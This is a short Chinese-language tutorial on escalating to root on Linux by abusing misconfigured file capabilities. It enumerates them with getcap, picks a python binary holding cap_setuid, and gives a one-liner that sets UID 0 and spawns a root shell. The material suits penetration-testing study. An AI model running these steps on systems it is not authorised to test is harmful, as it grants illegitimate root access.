利用capabilities提权的方法

Capabilities漏洞利用机制：

原理很简单，就是将之前与超级用户root（UID=0）关联的特权细分为不同的功能组，Capabilites作为线程（Linux并不真正区分进程和线程）的属性存在，每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类，具有

相似功能的内核调用被分到同一组中。

这样一来，权限检查的过程就变成了：在执行特权操作时，如果线程的有效身份不是root，就去检查其是否具有该特权操作所对应的capabilities，并以此为依据，决定是否可以执行特权操作。

如果Capabilities设置不正确，就会让攻击者有机可乘，实现权限提升。

利用思路：

收集带有capabilities属性的程序，而该程序带有capabilities就等于执行时带有特权，便可以用该程序进行uid的切换，切换为0即为root

操作

1.在目标机上以普通用户登录后运行

getcap -r /
或
getcap -r / 2>/dev/null

查看带有cat_setuid的capability的程序。

例子：

/usr/bin/python = cap_setuid_ep

2.根据该程序的名称到GTFOBins上进行查找，选择capabilities那一行

例子：

3.在目标机上运行

/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")'

即可为root